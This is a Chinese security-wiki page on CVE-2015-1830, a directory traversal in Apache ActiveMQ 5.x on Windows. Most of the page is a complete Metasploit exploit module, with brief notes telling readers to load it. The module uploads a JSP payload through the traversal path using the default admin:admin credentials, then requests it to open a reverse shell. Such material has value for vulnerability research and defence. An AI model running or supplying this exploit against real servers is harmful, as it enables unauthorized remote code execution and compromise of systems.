menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right ActiveMQ chevron_right (CVE-2015-1830)ActiveMQ 路径遍历导致未经身份验证的rce.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2015-1830)ActiveMQ 路径遍历导致未经身份验证的rce.md
    5.48 KB / 2021-04-21 09:23:46
        (CVE-2015-1830)ActiveMQ 路径遍历导致未经身份验证的rce
    =======================================================
    
    一、漏洞简介
    ------------
    
    Windows 5.11.2之前的Apache ActiveMQ
    5.x中blob消息的文件服务器上载/下载功能中的目录遍历漏洞允许远程攻击者通过未指定的向量在任意目录中创建JSP文件。
    
    二、漏洞影响
    ------------
    
    ActiveMQ 5.11.1
    
    三、复现过程
    ------------
    
    ### msf poc
    
    > 直接在msf里面搜索就行了,如果没有请更新msf版本,或者手动复制下面的脚本到msf目录下。
    
        ##
        # This module requires Metasploit: https://metasploit.com/download
        # Current source: https://github.com/rapid7/metasploit-framework
        ##
    
        class MetasploitModule < Msf::Exploit::Remote
          Rank = ExcellentRanking
    
          include Msf::Exploit::Remote::HttpClient
    
          def initialize(info = {})
            super(update_info(info,
              'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
              'Description'    => %q{
                This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
                ActiveMQ 5.x before 5.11.2 for Windows.
    
                The module tries to upload a JSP payload to the /admin directory via the traversal
                path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ
                credentials admin:admin (or other credentials provided by the user). It then issues
                an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
                payload and obtain a shell.
              },
              'Author'          =>
                [
                  'David Jorm',     # Discovery and exploit
                  'Erik Wynter'     # @wyntererik - Metasploit
                ],
              'References'     =>
                [
                  [ 'CVE', '2015-1830' ],
                  [ 'EDB', '40857'],
                  [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
                ],
              'Privileged'     => false,
              'Platform'    => %w{ win },
              'Targets'     =>
                [
                  [ 'Windows Java',
                    {
                      'Arch' => ARCH_JAVA,
                      'Platform' => 'win'
                    }
                  ],
                ],
              'DisclosureDate' => '2015-08-19',
              'License'        => MSF_LICENSE,
              'DefaultOptions'  => {
                'RPORT' => 8161,
                'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
                },
              'DefaultTarget'  => 0))
    
            register_options([
              OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
              OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),
              OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
              OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
            ])
          end
    
          def check
            print_status("Running check...")
            testfile = Rex::Text::rand_text_alpha(10)
            testcontent = Rex::Text::rand_text_alpha(10)
    
            send_request_cgi({
              'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
              'headers'     => {
                'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
                },
              'method'    => 'PUT',
              'data'      => "<% out.println(\"#{testcontent}\");%>"
            })
    
            res1 = send_request_cgi({
              'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
              'headers'     => {
                'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
                },
              'method'    => 'GET'
            })
    
            if res1 && res1.body.include?(testcontent)
              send_request_cgi(
                opts = {
                  'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
                  'headers'     => {
                    'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
                    },
                  'method'    => 'DELETE'
                },
                timeout = 1
              )
              return Exploit::CheckCode::Vulnerable
            end
    
            Exploit::CheckCode::Safe
          end
    
          def exploit
            print_status("Uploading payload...")
            testfile = Rex::Text::rand_text_alpha(10)
            vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
    
            send_request_cgi({
              'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
              'headers'     => {
                'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
                },
              'method'    => 'PUT',
              'data'      => payload.encoded
            })
    
            print_status("Payload sent. Attempting to execute the payload.")
            res = send_request_cgi({
              'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
              'headers'     => {
                'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
              },
              'method'    => 'GET'
            })
            if res && res.code == 200
              print_good("Payload executed!")
            else
              fail_with(Failure::PayloadFailed, "Failed to execute the payload")
            end
          end
        end
    
    
    links
    file_download